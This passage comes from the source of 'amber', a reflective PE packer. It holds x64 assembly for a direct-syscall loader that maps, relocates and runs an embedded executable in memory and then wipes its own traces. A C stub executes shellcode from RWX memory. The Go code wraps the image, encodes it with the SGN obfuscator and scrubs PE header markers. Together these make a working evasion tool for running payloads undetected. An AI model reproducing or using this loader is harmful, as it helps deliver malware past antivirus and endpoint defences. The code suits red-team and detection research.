89 | je loc_14000375c
90 | mov eax,0x1
91 | movsxd rdx,esi
92 | add rdx,rbx
93 | loc_1400036d9:
94 | mov r8,rax
95 | add rax,0x1
96 | cmp BYTE [rdx+rax*1],0x0
97 | jne loc_1400036d9
98 | loc_1400036e6:
99 | lea rax,[rsp+0x140]
100 | mov rdx,rcx
101 | mov rcx,rax
102 | call memcpy
103 | lea rcx,[rsp+0x30]
104 | call load_module
105 | mov rbx,rax
106 | mov eax,0x0
107 | test rbx,rbx
108 | je loc_140003738
109 | lea rcx,[rsp+0x140]
110 | mov edx,0x0
111 | call calc_crc
112 | mov edx,eax
113 | mov r8d,0xffffffff
114 | mov rcx,rbx
115 | call get_proc_by_crc
116 | mov rbx,rax
117 | loc_140003735:
118 | mov rax,rbx
119 | loc_140003738:
120 | add rsp,0x258
121 | pop rbx
122 | pop rsi
123 | pop rdi
124 | pop rbp
125 | pop r12
126 | pop r13
127 | pop r14
128 | pop r15
129 | ret
130 | loc_14000374c:
131 | mov esi,0x0
132 | mov r8d,0x0
133 | jmp loc_1400036af
134 | loc_14000375c:
135 | mov r8d,0x0
136 | jmp loc_1400036e6
137 | loc_140003764:
138 | mov eax,0x0
139 | jmp loc_140003738
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/load_module.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | load_module:
5 | push rdi
6 | sub rsp,0x250
7 | mov r8,rcx
8 | mov QWORD [rsp+0x248],0x0
9 | mov DWORD [rsp+0x234],0x0
10 | lea rdi,[rsp+0x20]
11 | mov ecx,0x41
12 | mov eax,0x0
13 | rep stosq
14 | cmp BYTE [r8],0x0
15 | je loc_140003873
16 | mov edx,0x1
17 | loc_1400037eb:
18 | mov rax,rdx
19 | add rdx,0x1
20 | cmp BYTE [r8+rdx*1-0x1],0x0
21 | jne loc_1400037eb
22 | lea edx,[rax+rax*1]
23 | mov WORD [rsp+0x230],dx
24 | add edx,0x2
25 | mov WORD [rsp+0x232],dx
26 | lea rdx,[rsp+0x20]
27 | mov QWORD [rsp+0x238],rdx
28 | sub eax,0x1
29 | js loc_140003837
30 | cdqe
31 | loc_140003824:
32 | movsx dx,BYTE [r8+rax*1]
33 | mov WORD [rsp+rax*2+0x20],dx
34 | sub rax,0x1
35 | test eax,eax
36 | jns loc_140003824
37 | loc_140003837:
38 | lea r9,[rsp+0x248]
39 | lea r8,[rsp+0x230]
40 | mov edx,0x0
41 | mov ecx,0x0
42 | mov r10, 0xB4EBB9A4
43 | call api_call
44 | call rax ;
45 | test eax,eax
46 | js loc_14000386c
47 | mov rax,QWORD [rsp+0x248]
48 | loc_140003863:
49 | add rsp,0x250
50 | pop rdi
51 | ret
52 | loc_14000386c:
53 | mov eax,0x0
54 | jmp loc_140003863
55 | loc_140003873:
56 | mov WORD [rsp+0x230],0x0
57 | mov WORD [rsp+0x232],0x2
58 | lea rax,[rsp+0x20]
59 | mov QWORD [rsp+0x238],rax
60 | jmp loc_140003837
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/map_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | map_image:
5 | push rbp
6 | push rdi
7 | push rsi
8 | push rbx
9 | sub rsp,0x48
10 | mov rbp,rcx
11 | movsxd rdi,DWORD [rcx+0x3c]
12 | add rdi,rcx
13 | mov eax,0x0
14 | cmp DWORD [rdi],0x4550
15 | jne loc_1400020b8
16 | mov QWORD [rsp+0x38],0x0
17 | mov eax,DWORD [rdi+0x50]
18 | mov QWORD [rsp+0x30],rax
19 | lea rdx,[rsp+0x38]
20 | mov DWORD [rsp+0x28],0x4
21 | mov DWORD [rsp+0x20],0x103000
22 | lea r9,[rsp+0x30]
23 | mov r8d,0x0
24 | mov rcx,0xffffffffffffffff
25 | mov r10, 0x99CE7C55
26 | call api_call
27 | mov r10,rax
28 | call syscall_api
29 | ;call rax ;
30 | mov edx,eax
31 | mov eax,0x0
32 | test edx,edx
33 | js loc_1400020b8
34 | mov r8d,DWORD [rdi+0x54]
35 | mov rdx,rbp
36 | mov rcx,QWORD [rsp+0x38]
37 | call memcpy
38 | movzx eax,WORD [rdi+0x14]
39 | lea rbx,[rdi+rax*1+0x18]
40 | cmp WORD [rdi+0x6],0x0
41 | je loc_1400020b3
42 | mov esi,0x0
43 | loc_14000208d:
44 | mov ecx,DWORD [rbx+0xc]
45 | add rcx,QWORD [rsp+0x38]
46 | mov edx,DWORD [rbx+0x14]
47 | add rdx,rbp
48 | mov r8d,DWORD [rbx+0x10]
49 | call memcpy
50 | add esi,0x1
51 | add rbx,0x28
52 | movzx eax,WORD [rdi+0x6]
53 | cmp eax,esi
54 | jg loc_14000208d
55 | loc_1400020b3:
56 | mov rax,QWORD [rsp+0x38]
57 | loc_1400020b8:
58 | add rsp,0x48
59 | pop rbx
60 | pop rsi
61 | pop rdi
62 | pop rbp
63 | ret
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/memcpy.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 | ; memcpy(&dst, &src, size) -- forward byte copy via rep movsb; not safe for overlapping regions.
4 | ; RCX = &dst
5 | ; RDX = &src
6 | ; R8 = size in bytes (RCX is left at 0 on return; RSI/RDI are preserved)
7 | memcpy:
8 | push rsi ; String instructions clobber RSI/RDI, so save them for the caller
9 | push rdi
10 | mov rdi,rcx ; destination
11 | mov rsi,rdx ; source
12 | mov rcx,r8 ; byte count
13 | copy_byte:
14 | rep movsb ; Copy RCX bytes from [RSI] to [RDI]; direction follows DF (no cld here, the caller's flag state applies)
15 | pop rdi ; Restore RDI
16 | pop rsi ; Restore RSI
17 | ret ; Return
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/protect_sections.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | protect_sections:
5 | push r14
6 | push r13
7 | push r12
8 | push rbp
9 | push rdi
10 | push rsi
11 | push rbx
12 | sub rsp,0x50
13 | mov rbp,rcx
14 | movsxd rdi,DWORD [rcx+0x3c]
15 | add rdi,rcx
16 | movzx eax,WORD [rdi+0x14]
17 | lea rbx,[rdi+rax*1+0x18]
18 | mov QWORD [rsp+0x48],0x0
19 | cmp WORD [rdi+0x6],0x0
20 | je loc_140002e87
21 | mov esi,0x0
22 | mov r12d,0x0
23 | lea r14,[rsp+0x40]
24 | lea r13,[rsp+0x48]
25 | jmp loc_140002f50
26 | loc_140002e38:
27 | mov ecx,0x1
28 | loc_140002e3d:
29 | and eax,0x60000000
30 | mov r8d,0x1
31 | cmp eax,0x60000000
32 | mov r9d,0x20
33 | mov eax,0x80
34 | cmovne r9d,eax
35 | jmp loc_140002eed
36 | loc_140002e61:
37 | mov r9d,0x20
38 | jmp loc_140002efd
39 | loc_140002e6c:
40 | mov eax,0x0
41 | jmp loc_140002e78
42 | loc_140002e73:
43 | mov eax,0x1
44 | loc_140002e78:
45 | add rsp,0x50
46 | pop rbx
47 | pop rsi
48 | pop rdi
49 | pop rbp
50 | pop r12
51 | pop r13
52 | pop r14
53 | ret
54 | loc_140002e87:
55 | mov eax,0x1
56 | jmp loc_140002e78
57 | loc_140002e8e:
58 | mov ecx,0x1
59 | mov r8d,r12d
60 | mov r9d,0x10
61 | jmp loc_140002edd
62 | loc_140002e9e:
63 | mov ecx,r12d
64 | test eax,0x20000000
65 | je loc_140002eda
66 | mov ecx,0x0
67 | test eax,eax
68 | js loc_140002e3d
69 | mov ecx,eax
70 | shr ecx,0x1f
71 | mov r8d,ecx
72 | mov ecx,r12d
73 | mov r9d,0x10
74 | jmp loc_140002edd
75 | loc_140002ec4:
76 | test eax,0x20000000
77 | jne loc_140002e38
78 | mov ecx,0x1
79 | mov r9d,0x4
80 | loc_140002eda:
81 | mov r8d,r12d
82 | loc_140002edd:
83 | and eax,0x60000000
84 | cmp eax,0x60000000
85 | je loc_140002e61
86 | loc_140002eed:
87 | test cl,cl
88 | je loc_140002efd
89 | test r8b,r8b
90 | mov eax,0x40
91 | cmovne r9d,eax
92 | loc_140002efd:
93 | mov eax,DWORD [rdx+0xc]
94 | add rax,rbp
95 | mov QWORD [rsp+0x48],rax
96 | mov eax,DWORD [rdx+0x10]
97 | mov QWORD [rsp+0x40],rax
98 | mov DWORD [rsp+0x3c],0x0
99 | lea rax,[rsp+0x3c]
100 | mov QWORD [rsp+0x20],rax
101 | mov r8,r14
102 | mov rdx,r13
103 | mov rcx,0xffffffffffffffff
104 | mov r10, 0x6EDE4D41
105 | call api_call
106 | mov r10,rax ;
107 | call syscall_api
108 | test eax,eax
109 | js loc_140002e6c
110 | loc_140002f3d:
111 | add esi,0x1
112 | add rbx,0x28
113 | movzx eax,WORD [rdi+0x6]
114 | cmp eax,esi
115 | jle loc_140002e73
116 | loc_140002f50:
117 | mov rdx,rbx
118 | mov eax,DWORD [rbx+0x24]
119 | test eax,eax
120 | je loc_140002f3d
121 | mov r9d,eax
122 | sar r9d,0x1f
123 | and r9d,0xffffffc8
124 | add r9d,0x40
125 | test eax,0x40000000
126 | je loc_140002e9e
127 | test eax,eax
128 | js loc_140002ec4
129 | test eax,0x20000000
130 | jne loc_140002e8e
131 | mov ecx,0x1
132 | mov r9d,0x2
133 | jmp loc_140002eda
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/relocate_image.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | relocate_image:
5 | mov r9,rcx
6 | movsxd rdx,DWORD [rcx+0x3c]
7 | add rdx,rcx
8 | mov eax,DWORD [rdx+0xb0]
9 | mov ecx,0x0
10 | test eax,eax
11 | je loc_14000261a
12 | mov eax,eax
13 | lea rcx,[r9+rax*1]
14 | mov r10,r9
15 | sub r10,QWORD [rdx+0x30]
16 | cmp DWORD [rcx],0x0
17 | jne loc_140002601
18 | mov ecx,0x1
19 | jmp loc_14000261a
20 | loc_1400025bd:
21 | mov edx,DWORD [rcx]
22 | movzx r8d,WORD [rax]
23 | and r8d,0xfff
24 | add rdx,r8
25 | add QWORD [r9+rdx*1],r10
26 | loc_1400025d1:
27 | add rax,0x2
28 | mov edx,DWORD [rcx+0x4]
29 | add rdx,rcx
30 | cmp rax,rdx
31 | je loc_1400025f9
32 | loc_1400025e0:
33 | movzx edx,BYTE [rax+0x1]
34 | mov r8d,edx
35 | and r8d,0xfffffff0
36 | cmp r8b,0xa0
37 | je loc_1400025bd
38 | cmp dl,0xf
39 | jbe loc_1400025d1
40 | jmp loc_1400025d1
41 | loc_1400025f9:
42 | mov rcx,rax
43 | loc_1400025fc:
44 | cmp DWORD [rcx],0x0
45 | je loc_140002615
46 | loc_140002601:
47 | lea rax,[rcx+0x8]
48 | mov edx,DWORD [rcx+0x4]
49 | add rdx,rcx
50 | cmp rax,rdx
51 | jne loc_1400025e0
52 | mov rcx,rdx
53 | jmp loc_1400025fc
54 | loc_140002615:
55 | mov ecx,0x1
56 | loc_14000261a:
57 | mov eax,ecx
58 | ret
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/resolve_imports.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | resolve_imports:
5 | push r12
6 | push rbp
7 | push rdi
8 | push rsi
9 | push rbx
10 | sub rsp,0x20
11 | mov rbp,rcx
12 | movsxd rax,DWORD [rcx+0x3c]
13 | mov eax,DWORD [rcx+rax*1+0x90]
14 | mov edx,0x0
15 | test eax,eax
16 | je loc_140002966
17 | mov eax,eax
18 | lea r12,[rcx+rax*1]
19 | mov ecx,DWORD [r12+0xc]
20 | test ecx,ecx
21 | jne loc_14000292f
22 | mov edx,0x1
23 | jmp loc_140002966
24 | loc_1400028cf:
25 | mov edx,0x0
26 | mov rcx,rdi
27 | call get_proc_by_crc
28 | test rax,rax
29 | je loc_1400028e4
30 | mov QWORD [rsi],rax
31 | loc_1400028e4:
32 | add rbx,0x8
33 | add rsi,0x8
34 | mov r8,QWORD [rbx]
35 | test r8,r8
36 | je loc_140002922
37 | loc_1400028f4:
38 | test r8,r8
39 | js loc_1400028cf
40 | lea rcx,[rbp+r8*1+0x2]
41 | mov edx,0x0
42 | call calc_crc
43 | mov edx,eax
44 | mov r8d,0xffffffff
45 | mov rcx,rdi
46 | call get_proc_by_crc
47 | test rax,rax
48 | je loc_1400028e4
49 | mov QWORD [rsi],rax
50 | loc_140002920:
51 | jmp loc_1400028e4
52 | loc_140002922:
53 | add r12,0x14
54 | mov ecx,DWORD [r12+0xc]
55 | test ecx,ecx
56 | je loc_14000295a
57 | loc_14000292f:
58 | mov ecx,ecx
59 | add rcx,rbp
60 | call load_module
61 | mov rdi,rax
62 | test rax,rax
63 | je loc_140002961
64 | mov ebx,DWORD [r12]
65 | add rbx,rbp
66 | mov esi,DWORD [r12+0x10]
67 | add rsi,rbp
68 | mov r8,QWORD [rbx]
69 | test r8,r8
70 | jne loc_1400028f4
71 | jmp loc_140002922
72 | loc_14000295a:
73 | mov edx,0x1
74 | jmp loc_140002966
75 | loc_140002961:
76 | mov edx,0x0
77 | loc_140002966:
78 | mov eax,edx
79 | add rsp,0x20
80 | pop rbx
81 | pop rsi
82 | pop rdi
83 | pop rbp
84 | pop r12
85 | ret
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/inc/run_tls_callbacks.asm:
--------------------------------------------------------------------------------
1 | [BITS 64]
2 |
3 |
4 | run_tls_callbacks:
5 | push rsi
6 | push rbx
7 | sub rsp,0x28
8 | mov rsi,rcx
9 | movsxd rax,DWORD [rcx+0x3c]
10 | mov eax,DWORD [rcx+rax*1+0xd0]
11 | mov edx,0x0
12 | test eax,eax
13 | je loc_1400033ad
14 | mov eax,eax
15 | mov rbx,QWORD [rcx+rax*1+0x18]
16 | mov edx,0x1
17 | test rbx,rbx
18 | jne loc_1400033ca
19 | loc_1400033ad:
20 | mov eax,edx
21 | add rsp,0x28
22 | pop rbx
23 | pop rsi
24 | ret
25 | loc_1400033b6:
26 | mov r8d,0x0
27 | mov edx,0x1
28 | mov rcx,rsi
29 | call rax
30 | add rbx,0x8
31 | loc_1400033ca:
32 | mov rax,QWORD [rbx]
33 | test rax,rax
34 | jne loc_1400033b6
35 | mov edx,0x1
36 | jmp loc_1400033ad
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/stub.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include "shellcode.h"
3 |
4 | int main(int argc, char const *argv[])
5 | {
6 | char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
7 | memcpy(BUFFER, shellcode, sizeof(shellcode));
8 | (*(void(*)())BUFFER)();
9 | return 0;
10 | }
11 |
--------------------------------------------------------------------------------
/loader/syscall-loader-x64/syscall-loader-x64.asm:
--------------------------------------------------------------------------------
1 | ;#==============================================#
2 | ;# X64 Reflective Loader #
3 | ;# Author: Ege Balcı #
4 | ;# Version: 3.0 #
5 | ;#==============================================#
6 | ;
7 | [BITS 64]
8 |
9 | %define e_lfanew 0x3C
10 | %define _AddressOfEntry 0x28
11 |
12 | call start ; Get the address of PE image to stack
13 | incbin "putty.exe" ; PE file.
14 | start:
15 | pop rsi ; Get the address of PE to RSI
16 | push rbp ; Save RBP
17 | mov rbp,rsp ; Create a stack frame
18 | mov rcx,rsi ; Move the image address as first parameter
19 | call map_image ; Perform PE image mapping
20 | mov rdi, rax ; Get the address of mapped PE image into RDI
21 | mov rcx, rdi ; Move a copy of the mapped image address into RCX as first parameter
22 | call resolve_imports ; Resolve image imports
23 | mov rcx, rdi ; Set the mapped image address as first parameter
24 | call relocate_image ; Perform image base relocation
25 | mov rcx, rdi ; Set the mapped image address as first parameter
26 | call protect_sections ; Apply proper section memory protections
27 | mov rcx, rdi ; Set the mapped image address as first parameter
28 | call run_tls_callbacks ; Try to execute TLS callbacks. May fail... ¯\_(ツ)_/¯
29 | xor rax, rax ; Clear out RAX
30 | mov eax, DWORD [rdi+e_lfanew] ; Get the file header offset
31 | mov eax, DWORD [rdi+rax+_AddressOfEntry] ; Get the AddressOfEntry into EAX
32 | add rax,rdi ; Add the AOE onto new image base
33 | jmp wipe ; Start wiping memory artifacts...
34 | ; ------------------------ FUNCTIONS ------------------------------------
35 | %include "./inc/memcpy.asm"
36 | %include "./inc/calc_crc.asm"
37 | %include "./inc/map_image.asm"
38 | %include "./inc/load_module.asm"
39 | %include "./inc/relocate_image.asm"
40 | %include "./inc/resolve_imports.asm"
41 | %include "./inc/get_proc_by_crc.asm"
42 | %include "./inc/get_module_by_crc.asm"
43 | %include "./inc/protect_sections.asm"
44 | %include "./inc/run_tls_callbacks.asm"
45 | %include "../crc32_api/crc32_api_x64.asm"
46 | %include "../syscall_api/syscall_api.asm"
47 | ;------------------------ FUNCTIONS -------------------------------------
wipe:
wipe_code_size equ wipe_end-(wipe)
; Erase the loader's own footprint in place. The range written is
; [RSI-5, wipe_end): the initial 5-byte call, the raw PE bytes, every helper
; above, and this routine up to (but not including) the rep stosb. Only the
; five trailing instructions survive.
; NOTE(review): the fill value is AL, i.e. the low byte of the entry address
; left in RAX by the code above, not zero. If a zero fill is intended, AL has
; to be cleared first (and RAX preserved some other way).
; NOTE(review): rep stosb walks in the direction selected by DF, and the cld
; below comes *after* the store, so it does not protect this routine. The
; Windows x64 ABI guarantees DF clear at call boundaries, so this only bites
; if the blob is entered with DF set.
call $+5 ; Push the address of the next instruction (current RIP)
pop rcx ; RCX = address of this pop
sub rcx,rsi ; RCX = distance from the PE start to here
add rcx,wipe_code_size ; ... plus the rest of this routine up to wipe_end
mov rdi,rsi ; RDI = PE start
sub rdi,0x5 ; Back up over the initial 5-byte call so it is erased too
wipe_end:
rep stosb ; Fill [RDI, RDI+RCX) with AL; RDI increments while DF is clear
; -------------------- SWITCH TO PE ----------------------------
cld ; Clear the direction flag for the image's code
mov rsp, rbp ; Restore the stack pointer saved at start
pop rbp ; Restore the caller's RBP
; NOTE(review): no arguments are set up for the entry point. An EXE entry
; ignores them, but a DLL's DllMain(hinst, reason, reserved) would receive
; whatever RCX/RDX/R8 hold here — confirm DLL inputs are rejected or handled upstream.
jmp rax ; Transfer control to the mapped image's entry point
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | "os"
5 | "time"
6 |
7 | "github.com/EgeBalci/amber/config"
8 | amber "github.com/EgeBalci/amber/pkg"
9 | "github.com/EgeBalci/amber/utils"
10 | sgn "github.com/EgeBalci/sgn/pkg"
11 | "github.com/briandowns/spinner"
12 | "github.com/fatih/color"
13 | )
14 |
// spinr is the terminal spinner shown while the payload is being encoded;
// main starts and stops it around encoder.Encode.
var spinr = spinner.New(spinner.CharSets[9], 30*time.Millisecond)
17 |
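// main drives the tool: parse options, open the input PE, wrap it in the
// reflective loader, optionally encode the result with SGN, and write it to
// the configured output file. Every failure is fatal (utils.PrintFatal); the
// one non-fatal exit is an input without base relocations, which the loader
// cannot relocate and therefore cannot run.
func main() {
	printBanner()
	cfg, err := config.Parse()
	if err != nil {
		utils.PrintFatal(err)
	}

	encoder, err := sgn.NewEncoder(64)
	if err != nil {
		utils.PrintFatal(err)
	}
	encoder.EncodingCount = cfg.EncodeCount
	encoder.ObfuscationLimit = cfg.ObfuscationLimit
	cfg.PrintSummary()

	pe, err := amber.Open(cfg.FileName)
	if err != nil {
		utils.PrintFatal(err)
	}
	pe.SyscallLoader = cfg.UseSyscalls

	// The loader maps the image at an arbitrary address and relies on the
	// .reloc directory to fix it up; an image stripped of relocations is unusable.
	if !pe.HasRelocData {
		utils.PrintErr("%s has no relocation data. Exiting...\n", pe.Name)
		return
	}

	payload, err := pe.AssembleLoader()
	if err != nil {
		utils.PrintFatal(err)
	}

	if encoder.EncodingCount > 0 {
		spinr.Suffix = " Encoding reflective payload..."
		spinr.Start()
		encoder.SetArchitecture(pe.Architecture)
		payload, err = encoder.Encode(payload)
		// Stop the spinner before any fatal message so the output is not interleaved.
		spinr.Stop()
		if err != nil {
			utils.PrintFatal(err)
		}
	}

	// Write, close and check in one step: a failed or short write must not be
	// reported as a generated payload. 0666 is what os.Create used (umask applies).
	if err := os.WriteFile(cfg.OutputFile, payload, 0666); err != nil {
		utils.PrintFatal(err)
	}

	finSize, err := utils.GetFileSize(cfg.OutputFile)
	if err != nil {
		utils.PrintFatal(err)
	}
	utils.PrintStatus("Final Size: %d bytes\n", finSize)
	utils.PrintStatus("Output File: %s\n", cfg.OutputFile)
	utils.PrintGreen("[✔] Reflective PE generated !\n")
}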
80 |
// BANNER is the startup header printed by printBanner; its two %s verbs are
// filled with the version string and the project URL.
const BANNER string = `

// █████╗ ███╗ ███╗██████╗ ███████╗██████╗
// ██╔══██╗████╗ ████║██╔══██╗██╔════╝██╔══██╗
// ███████║██╔████╔██║██████╔╝█████╗ ██████╔╝
// ██╔══██║██║╚██╔╝██║██╔══██╗██╔══╝ ██╔══██╗
// ██║ ██║██║ ╚═╝ ██║██████╔╝███████╗██║ ██║
// ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝
// Reflective PE Packer ☣ Copyright (c) 2017 EGE BALCI
// %s - %s

`
94 |
// printBanner prints BANNER in bold red to stdout, embedding the version
// (bold green) and the project URL (bold blue) in its two %s slots.
func printBanner() {
	bold := func(attr color.Attribute) *color.Color {
		return color.New(attr).Add(color.Bold)
	}
	version := bold(color.FgGreen).Sprintf("v%s", config.Version)
	link := bold(color.FgBlue).Sprintf("https://github.com/egebalci/amber")
	bold(color.FgRed).Printf(BANNER, version, link)
}
101 |
--------------------------------------------------------------------------------
/pkg/amber.go:
--------------------------------------------------------------------------------
1 | package amber
2 |
3 | import (
4 | "bytes"
5 | "encoding/binary"
6 | "errors"
7 | "path/filepath"
8 |
9 | "github.com/EgeBalci/amber/utils"
10 | pe "github.com/EgeBalci/debug/pe"
11 | )
12 |
const (
	// PE_DOS_STUB is the message text of the standard DOS stub. ScrapePeHeaders
	// blanks it to remove an obvious static signature from the embedded image.
	PE_DOS_STUB = "This program cannot be run in DOS mode"
)
16 |
var (
	// ErrUnsupportedArch is returned by Open and AssembleLoader for machine
	// types other than i386 and AMD64.
	ErrUnsupportedArch = errors.New("unsupported PE file architecture")
	// ErrInvalidPeSpecs is exported for callers but is not returned anywhere in this file.
	ErrInvalidPeSpecs = errors.New("unsupported PE file specs")
	// ErrInvalidPeHeaders is returned by ScrapePeHeaders when its header checks fail.
	ErrInvalidPeHeaders = errors.New("invalid PE headers")
)
22 |
// PE holds everything amber needs about the input executable: the tool
// options that steer AssembleLoader, the header values read by Open, and the
// parsed file itself.
type PE struct {
	Name     string // path as given on the command line
	FullName string // absolute path (filepath.Abs of Name)
	FileSize int    // size of the input file in bytes
	// Tool options. Only IatResolver, SyscallLoader and ScrapeHeaders are read
	// in this file (by AssembleLoader); IAT, Resource and IgnoreIntegrity are
	// neither set nor read here.
	IAT             bool
	Resource        bool
	IgnoreIntegrity bool
	IatResolver     bool // swap the loader's CRC32 API resolver for the IAT-based one
	SyscallLoader   bool // use the direct-syscall 64-bit loader
	ScrapeHeaders   bool // blank the MZ magic and DOS stub text in the embedded image
	// PE specs (populated by Open)...
	Architecture      int    // 32 or 64, from FileHeader.Machine
	SizeOfImage       uint32 // OptionalHeader.SizeOfImage
	ImageBase         uint64 // OptionalHeader.ImageBase (widened for PE32)
	AddressOfEntry    uint32 // not populated by Open in this file
	Subsystem         uint16 // OptionalHeader.Subsystem
	ImportTable       uint64 // import directory RVA plus ImageBase
	ExportTable       uint64 // export directory RVA plus ImageBase
	RelocTable        uint64 // base relocation directory RVA plus ImageBase
	ImportAdressTable uint64 // IAT directory RVA plus ImageBase (field name kept as is for compatibility)
	HasBoundedImports bool   // DataDirectory[11] (bound imports) is non-empty
	HasDelayedImports bool   // DataDirectory[13] (delay imports) is non-empty
	HasTLSCallbacks   bool   // not populated by Open in this file
	HasRelocData      bool   // DataDirectory[5] (base relocations) is non-empty; main refuses images without it
	IsCLR             bool   // DataDirectory[14] (CLR header) is non-empty, i.e. a .NET image
	IsDLL             bool   // IMAGE_FILE_DLL is set in FileHeader.Characteristics

	// Parsed PE file; stays open for AssembleLoader, nothing in this file closes it.
	file *pe.File
}
55 |
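// Open parses the PE file at fileName and fills a PE with the header values
// that loader generation depends on. Only i386 and AMD64 images are accepted
// (ErrUnsupportedArch otherwise); an optional header of an unrecognised type
// yields ErrInvalidPeHeaders instead of a half-filled struct. On any error the
// returned *PE is nil.
//
// The underlying *pe.File is kept open because AssembleLoader reads its raw
// bytes later; nothing in this file closes it.
func Open(fileName string) (*PE, error) {
	bp := &PE{Name: fileName}

	var err error
	if bp.FullName, err = filepath.Abs(fileName); err != nil {
		return nil, err
	}
	if bp.file, err = pe.Open(bp.FullName); err != nil {
		return nil, err
	}

	switch bp.file.FileHeader.Machine {
	case pe.IMAGE_FILE_MACHINE_I386:
		bp.Architecture = 32
	case pe.IMAGE_FILE_MACHINE_AMD64:
		bp.Architecture = 64
	default:
		return nil, ErrUnsupportedArch
	}
	// IMAGE_FILE_DLL is a single flag bit in Characteristics.
	bp.IsDLL = bp.file.Characteristics&pe.IMAGE_FILE_DLL != 0

	// PE32 and PE32+ share the data directory layout; only the width of
	// ImageBase differs. Virtual addresses are formed in 64 bits so that a
	// PE32+ base above 4 GiB (the usual 0x140000000 default) is not truncated,
	// which the previous uint32(hdr.ImageBase) arithmetic did.
	var (
		imageBase uint64
		dirs      [16]pe.DataDirectory
	)
	switch hdr := bp.file.OptionalHeader.(type) {
	case *pe.OptionalHeader32:
		imageBase = uint64(hdr.ImageBase)
		bp.Subsystem = hdr.Subsystem
		bp.SizeOfImage = hdr.SizeOfImage
		dirs = hdr.DataDirectory
	case *pe.OptionalHeader64:
		imageBase = hdr.ImageBase
		bp.Subsystem = hdr.Subsystem
		bp.SizeOfImage = hdr.SizeOfImage
		dirs = hdr.DataDirectory
	default:
		return nil, ErrInvalidPeHeaders
	}
	bp.ImageBase = imageBase

	// Data directory indices follow IMAGE_DIRECTORY_ENTRY_*.
	const (
		dirExport      = 0
		dirImport      = 1
		dirBaseReloc   = 5
		dirBoundImport = 11
		dirIAT         = 12
		dirDelayImport = 13
		dirCLR         = 14
	)
	va := func(i int) uint64 { return uint64(dirs[i].VirtualAddress) + imageBase }
	bp.ExportTable = va(dirExport)
	bp.ImportTable = va(dirImport)
	bp.RelocTable = va(dirBaseReloc)
	bp.ImportAdressTable = va(dirIAT)
	bp.HasRelocData = dirs[dirBaseReloc].Size != 0
	bp.HasBoundedImports = dirs[dirBoundImport].Size != 0
	bp.HasDelayedImports = dirs[dirDelayImport].Size != 0
	bp.IsCLR = dirs[dirCLR].Size != 0

	if bp.FileSize, err = utils.GetFileSize(bp.FullName); err != nil {
		return nil, err
	}
	return bp, nil
}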
116 |
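// AssembleLoader builds the final reflective payload:
//
//	[e8 <len(PE)>] [raw PE bytes] [pre-assembled loader]
//
// The leading call pushes the address of the PE onto the stack; the loader
// (LOADER_32, LOADER_64 or SYSCALL_LOADER_64 from static.go) pops it and maps
// the image at run time. With IatResolver set, the loader's CRC32-based API
// resolver block is swapped for the IAT-based one. Unsupported option
// combinations are rejected before any work is done; anything other than a
// 32- or 64-bit x86 image yields ErrUnsupportedArch.
func (pe *PE) AssembleLoader() ([]byte, error) {
	if pe.SyscallLoader && pe.Architecture == 32 {
		return nil, errors.New("syscall loader only supports 64 bit PE files")
	}
	if pe.SyscallLoader && pe.IatResolver {
		return nil, errors.New("cannot use IAT resolver with syscall loader")
	}

	var loader, crcAPI, iatAPI []byte
	switch pe.Architecture {
	case 32:
		loader, crcAPI, iatAPI = LOADER_32, CRC_API_32, IAT_API_32
	case 64:
		loader, crcAPI, iatAPI = LOADER_64, CRC_API_64, IAT_API_64
		if pe.SyscallLoader {
			loader = SYSCALL_LOADER_64
		}
	default:
		return nil, ErrUnsupportedArch
	}

	rawFile := pe.file.RawBytes
	if pe.ScrapeHeaders {
		var err error
		if rawFile, err = pe.ScrapePeHeaders(); err != nil {
			return nil, err
		}
	}

	// Call over the embedded image; the loader goes right after it.
	payload, err := pe.AddCallOver(rawFile)
	if err != nil {
		return nil, err
	}
	loaderStart := len(payload)
	payload = append(payload, loader...)

	if pe.IatResolver {
		// Swap the resolver block only inside the loader bytes: the embedded
		// PE must never be pattern-replaced, and a silent "not found" would
		// emit a loader that still resolves APIs by CRC.
		// NOTE(review): if len(crcAPI) != len(iatAPI) the loader's relative
		// displacements shift; static.go is expected to keep them equal — confirm.
		if !bytes.Contains(payload[loaderStart:], crcAPI) {
			return nil, errors.New("CRC API block not found in loader; cannot switch to IAT resolver")
		}
		patched := bytes.ReplaceAll(payload[loaderStart:], crcAPI, iatAPI) // always a fresh slice
		payload = append(payload[:loaderStart], patched...)
	}

	return payload, nil
}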
171 |
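// AddCallOver prefixes payload with a 5-byte `call rel32` whose displacement
// is len(payload): executing the result pushes the address of payload's first
// byte and lands on the first byte after it, which is where the loader is
// appended. The loader pops that address to locate the embedded PE.
//
// The displacement is a signed 32-bit value, so payloads of 2 GiB or more
// cannot be encoded and are rejected instead of silently wrapping.
func (pe *PE) AddCallOver(payload []byte) ([]byte, error) {
	const maxRel32 = 1<<31 - 1 // largest forward displacement a call rel32 can express
	n := len(payload)
	if n > maxRel32 {
		return nil, errors.New("payload too large for a 32-bit call displacement")
	}
	out := make([]byte, 5, 5+n)
	out[0] = 0xe8 // call rel32
	binary.LittleEndian.PutUint32(out[1:5], uint32(n))
	return append(out, payload...), nil
}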
184 |
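// ScrapePeHeaders returns a copy of the PE's raw bytes with the two most
// obvious static markers blanked: the "MZ" magic and the DOS stub message
// (PE_DOS_STUB). The "PE\0\0" signature is left intact because the
// pre-assembled loader (map_image in static.go) compares it before mapping.
//
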